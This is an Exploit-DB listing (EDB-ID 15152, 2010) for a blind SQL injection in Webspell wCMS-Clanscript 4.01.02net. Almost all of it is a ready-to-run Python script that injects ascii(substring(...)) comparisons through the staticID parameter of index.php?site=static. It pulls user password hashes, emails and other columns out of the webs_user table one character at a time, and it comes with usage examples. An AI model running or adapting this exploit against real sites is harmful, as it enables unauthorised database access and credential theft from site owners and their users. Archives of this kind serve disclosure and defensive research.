Webspell wCMS-Clanscript4.01.02net<= static&static; Blind SQL Injection Vulnerability

2010-09-29T00:00:00
ID EDB-ID:15152
Type exploitdb
Reporter Easy Laster
Modified 2010-09-29T00:00:00

Description

Webspell wCMS-Clanscript4.01.02net<= static&static Blind SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            #----------------------------Information------------------------------------------------
#+Autor : Easy Laster
#+ICQ : 11-051-551
#+Date   : 29.09.2010
#+Script  : Webspell wCMS-Clanscript4.01.02net&lt;= static&static Blind SQL Injection Exploit
#+Price : $00,00
#+Language :PHP
#+Discovered by Easy Laster
#+code by Dr.ChAoS
#+Security Group Undergroundagents,Free-hack and 4004-Security-Project
#+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
#Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
#N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox,enco,
#and all member from free-hack.com.
#---------------------------------------------------------------------------------------
#!/usr/bin/env python
#-*- coding:utf-8 -*-
import sys, urllib2, getopt

def out(str):
    sys.stdout.write(str)
    sys.stdout.flush()

def read_url(url):
    while True:
        try:
            src = urllib2.urlopen(url).read()
            break
        except:
            pass
    return src
   
class Exploit:
    charset = "0123456789abcdefABCDEF"
    url = ""
    charn = 1
    id = 1
    table_prefix = "webs_"
    table_field = ""
    passwd = ""
    columns = []
    find_passwd = True
   
    def __init__(self):
        if len(sys.argv) &lt; 2:
            print "*****************************************************************************"
            print "*Webspell wCMS-Clanscript4.01.02net static&static Blind SQL Injection Exploit*"
            print "*****************************************************************************"
            print "*                Discovered and vulnerability by Easy Laster                *"
            print "*                             coded by Dr.ChAoS                             *"
            print "*****************************************************************************"
            print "* Usage:                                                                    *"
            print "* python exploit.py [OPTION...] [SWITCH...] &lt;url&gt;                           *"
            print "*                                                                           *"
            print "* Example:                                                                  *"
            print "*                                                                           *"
            print "* Get the password of the user with id 2:                                   *"
            print "* python exploit.py --id 2 http://site.de/path/                             *"
            print "*                                                                           *"
            print "* Get email, username and password of id 1:                                 *"
            print "* python exploit.py --columns 80:1:email,25:5:username http://site.de/      *"
            print "*                                                                           *"
            print "* Switches:                                                                 *"
            print "* --nopw                                  Search no password                *"
            print "*                                                                           *"
            print "* Options:                                                                  *"
            print "* --id &lt;user id&gt;                          User id                           *"
            print "* --prefix &lt;table prefix&gt;                 Table prefix of ECP               *"
            print "* --charn &lt;1 - 32, default = 1&gt;           Start at position x               *"
            print "* --columns &lt;max_chars:charn:column,...&gt;  Get value of any column you want  *"
            print "*****************************************************************************"
            exit()
        opts, switches = getopt.getopt(sys.argv[1:], "", ["id=", "prefix=", "charn=", "columns=", "nopw"])
        for opt in opts:
            if opt[0] == "--id":
                self.id = int(opt[1])
            elif opt[0] == "--prefix":
                self.table_prefix = opt[1]
            elif opt[0] == "--charn":
                self.charn = int(opt[1])
            elif opt[0] == "--columns":
                for col in opt[1].split(","):
                    max, charx, name = col.split(":")
                    self.columns.append([int(max), int(charx), name, ""])
            elif opt[0] == "--nopw":
                self.find_passwd = False
        for switch in switches:
            if switch[:4] == "http":
                if switch[-1:] == "/":
                    self.url = switch
                else:
                    self.url = switch + "/"
    def valid_page(self, src):
        if "http://www.wookie.de/images/baustelle.gif" not in src:
            return True
        else:
            return False
    def generate_url(self, ascii):
        return self.url + "index.php?site=static&staticID=1%27+and+ascii(substring((SELECT%20" + self.table_field + "%20FROM%20" + self.table_prefix + "user+WHERE+userid=" + str(self.id) + ")," + str(self.charn) + ",1))%3E" + str(ord(ascii)) + "--+"
    def start(self):
        print "Exploiting..."
        if self.find_passwd:
            charx = self.charn
            self.password()
        if len(self.columns) &gt; 0:
            self.read_columns()
        print "All finished!\n"
        print "------ Results ------"
        if len(self.columns) &gt; 0:
            for v in self.columns:
                print "Column \"" + v[2] + "\": " + v[3]
        if self.find_passwd:
            if len(self.passwd) == 32 - charx + 1:
                print "Password: " + self.passwd
            else:
                print "Password not found!"
        print "---------------------"
    def read_columns(self):
        end = False
        charrange = [0]
        charrange.extend(range(32, 256))
        for i in range(len(self.columns)):
            out("Getting value of \"" + self.columns[i][2] + "\": ")
            self.table_field = self.columns[i][2]
            self.charn = self.columns[i][1]
            for pwc in range(self.charn, self.columns[i][0] + 1):
                if end == True:
                    break
                self.charn = pwc
                end = False
                for c in charrange:
                    src = read_url(self.generate_url(chr(c)))
                    if self.valid_page(src):
                        if c == 0:
                            end = True
                        else:
                            self.columns[i][3] += chr(c)
                            out(chr(c))
                        break
            out("\n")
    def password(self):
        out("Getting password: ")
        self.table_field = "password"
        for pwc in range(self.charn, 33):
            self.charn = pwc
            for c in self.charset:
                src = read_url(self.generate_url(c))
                if self.valid_page(src):
                    self.passwd += c
                    out(c)
                    break
        out("\n")

exploit = Exploit()
exploit.start()